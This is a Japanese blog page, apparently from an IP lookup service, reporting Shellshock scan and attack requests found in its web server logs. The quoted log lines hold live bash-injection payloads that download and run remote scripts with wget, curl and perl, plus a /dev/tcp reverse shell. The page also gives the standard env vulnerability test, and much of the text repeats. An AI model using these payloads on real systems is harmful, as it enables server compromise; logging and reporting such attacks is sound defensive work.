adsense
2014年11月5日水曜日
2014年10月5日日曜日
bashの脆弱性を狙ったリクエスト (その2)
現在もbashの脆弱性を狙ったリクエストが継続しています。
下記の通り、bashの引数に色々なコマンドが付与されたリクエストがきており、単なる調査目的のものから、踏み台にして他のサイトに対して不正アクセスを試みるものまで様々見受けられます。
217.72.242.16 - - [29/Sep/2014:00:08:28 +0000] "GET /test/ HTTP/1.0" 403 287 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
173.45.100.18 - - [29/Sep/2014:03:31:29 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
8.37.217.198 - - [29/Sep/2014:18:06:22 +0000] "GET /result.php HTTP/1.1" 200 21422 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [29/Sep/2014:23:03:12 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
62.210.75.170 - - [30/Sep/2014:06:09:40 +0000] "GET / HTTP/1.1" 200 25839 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
62.210.75.170 - - [30/Sep/2014:06:09:41 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 305 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
142.4.215.115 - - [01/Oct/2014:08:20:56 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
8.37.217.196 - - [01/Oct/2014:21:08:43 +0000] "GET /blacklist.html HTTP/1.1" 200 22457 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [01/Oct/2014:21:08:43 +0000] "GET /widgets.html HTTP/1.1" 200 5297 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [01/Oct/2014:21:08:44 +0000] "GET /tagsearch.html HTTP/1.1" 200 20663 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [02/Oct/2014:01:48:59 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
50.193.119.109 - - [02/Oct/2014:17:39:18 +0000] "GET / HTTP/1.0" 200 25889 "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:17:07:30 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 305 "-" "() { :;}; /bin/bash -c \"
アクセス元のIPアドレスを調べると、アクセスが多い順で、
1. アメリカ
2. フランス
3. 中国
4. イギリス
5. カナダ
6. オランダ
となっていました。
下記のコマンドをコンソール上で実行することにより、脆弱性があるか確認できますので、必要に応じて対策を実施しましょう。
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
“echo vulnerable“ の部分が勝手に実行されてしまうコマンド部分
– 脆弱性がある場合の表示
• vulnerable
• this is a test
– 脆弱性がない場合の表示
• bash: warning: x: ignoring function definition attempt
• bash: error importing function definition for `x'
• this is a test
下記の通り、bashの引数に色々なコマンドが付与されたリクエストがきており、単なる調査目的のものから、踏み台にして他のサイトに対して不正アクセスを試みるものまで様々見受けられます。
217.72.242.16 - - [29/Sep/2014:00:08:28 +0000] "GET /test/ HTTP/1.0" 403 287 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
173.45.100.18 - - [29/Sep/2014:03:31:29 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
8.37.217.198 - - [29/Sep/2014:18:06:22 +0000] "GET /result.php HTTP/1.1" 200 21422 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [29/Sep/2014:23:03:12 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
62.210.75.170 - - [30/Sep/2014:06:09:40 +0000] "GET / HTTP/1.1" 200 25839 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
62.210.75.170 - - [30/Sep/2014:06:09:41 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 305 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
142.4.215.115 - - [01/Oct/2014:08:20:56 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
8.37.217.196 - - [01/Oct/2014:21:08:43 +0000] "GET /blacklist.html HTTP/1.1" 200 22457 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [01/Oct/2014:21:08:43 +0000] "GET /widgets.html HTTP/1.1" 200 5297 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [01/Oct/2014:21:08:44 +0000] "GET /tagsearch.html HTTP/1.1" 200 20663 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [02/Oct/2014:01:48:59 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
50.193.119.109 - - [02/Oct/2014:17:39:18 +0000] "GET / HTTP/1.0" 200 25889 "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:17:07:30 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 305 "-" "() { :;}; /bin/bash -c \"
アクセス元のIPアドレスを調べると、アクセスが多い順で、
1. アメリカ
2. フランス
3. 中国
4. イギリス
5. カナダ
6. オランダ
となっていました。
下記のコマンドをコンソール上で実行することにより、脆弱性があるか確認できますので、必要に応じて対策を実施しましょう。
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
“echo vulnerable“ の部分が勝手に実行されてしまうコマンド部分
– 脆弱性がある場合の表示
• vulnerable
• this is a test
– 脆弱性がない場合の表示
• bash: warning: x: ignoring function definition attempt
• bash: error importing function definition for `x'
• this is a test
2014年9月27日土曜日
bashの脆弱性(Shellshock)を狙ったリクエスト
bashの脆弱性 (shellshock)のニュースが世間を騒がせていますが、直近の当サイトへのアクセスログを確認したところ、こんなアクセスを観測しました。
x.x.x.x - - [25/Sep/2014:06:25:51 +0000] "GET / HTTP/1.0" 200 26104 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
x.x.x.x - - [26/Sep/2014:12:56:07 +0000] "GET / HTTP/1.0" 200 25833 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/x.x.x.x/3333 0>&1'"
x.x.x.x- - [25/Sep/2014:11:55:03 +0000] "GET / HTTP/1.1" 200 26087 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
x.x.x.x - - [25/Sep/2014:13:58:01 +0000] "GET / HTTP/1.1" 200 26076 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
やはりスキャンが横行しているようですね。アクセス元は中国やアメリカでした。
スキャン元のソースIPアドレスを"shellshock"のタグ名でいくつか登録しておきました。
登録タグの検索ページから確認してみてください。
http://www.iputilities.net/tagsearch.html
もし同様のスキャンを見つけた方は、"shellshock"タグで登録頂けると幸いです。
参考:
GNU bash の脆弱性に関する注意喚起
https://www.jpcert.or.jp/at/2014/at140037.html
警視庁 Bash の脆弱性を標的としたアクセスの観測について
http://www.npa.go.jp/cyberpolice/detect/pdf/20140925-2.pdf
x.x.x.x - - [25/Sep/2014:06:25:51 +0000] "GET / HTTP/1.0" 200 26104 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
x.x.x.x - - [26/Sep/2014:12:56:07 +0000] "GET / HTTP/1.0" 200 25833 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/x.x.x.x/3333 0>&1'"
x.x.x.x- - [25/Sep/2014:11:55:03 +0000] "GET / HTTP/1.1" 200 26087 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
x.x.x.x - - [25/Sep/2014:13:58:01 +0000] "GET / HTTP/1.1" 200 26076 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
やはりスキャンが横行しているようですね。アクセス元は中国やアメリカでした。
登録タグの検索ページから確認してみてください。
http://www.iputilities.net/tagsearch.html
もし同様のスキャンを見つけた方は、"shellshock"タグで登録頂けると幸いです。
参考:
GNU bash の脆弱性に関する注意喚起
https://www.jpcert.or.jp/at/2014/at140037.html
警視庁 Bash の脆弱性を標的としたアクセスの観測について
http://www.npa.go.jp/cyberpolice/detect/pdf/20140925-2.pdf
2014年9月13日土曜日
タグの検索結果をエクスポートする機能を追加
タグの検索結果をエクスポートする機能を追加しました。
使い方:
使い方:
- 登録タグの検索画面 http://www.iputilities.net/tagsearch.html へアクセス
- 検索キーワードを入力し、検索ボタンをクリック( 例: SPAM)
- 検索結果の画面に表示される"Export the result to CSV"のリンクをクリック
2014年9月8日月曜日
LINEやGmail等のセキュリティアラート
Yahooニュースの個人記事でwww.iputilities.netを扱って頂いてました。
http://bylines.news.yahoo.co.jp/kandatoshiaki/20140907-00038891/
LINEやGmailなどでは、セキュリティアラートにIPアドレス情報が提供されるので、その調査に利用される機会が増えています。また、楽天等のECサイトでもログイン時の履歴にIPアドレスが記録されており、アクセス元の確認に利用できます。
楽天のログイン履歴の見方:
http://ichiba.faq.rakuten.co.jp/app/answers/detail/a_id/9376
Google 不審なアクティビティのアラート:
https://support.google.com/accounts/answer/1144110?hl=ja
http://bylines.news.yahoo.co.jp/kandatoshiaki/20140907-00038891/
LINEやGmailなどでは、セキュリティアラートにIPアドレス情報が提供されるので、その調査に利用される機会が増えています。また、楽天等のECサイトでもログイン時の履歴にIPアドレスが記録されており、アクセス元の確認に利用できます。
楽天のログイン履歴の見方:
http://ichiba.faq.rakuten.co.jp/app/answers/detail/a_id/9376
Google 不審なアクティビティのアラート:
https://support.google.com/accounts/answer/1144110?hl=ja
2014年9月4日木曜日
2014年1月6日月曜日
誠 Biz.ID でご紹介頂きました
「IPアドレスやホスト名からユーザー情報を調べる5つのサービス」のトップに記載頂きました。
http://bizmakoto.jp/bizid/articles/1401/06/news006.html
http://bizmakoto.jp/bizid/articles/1401/06/news006.html
登録:
投稿 (Atom)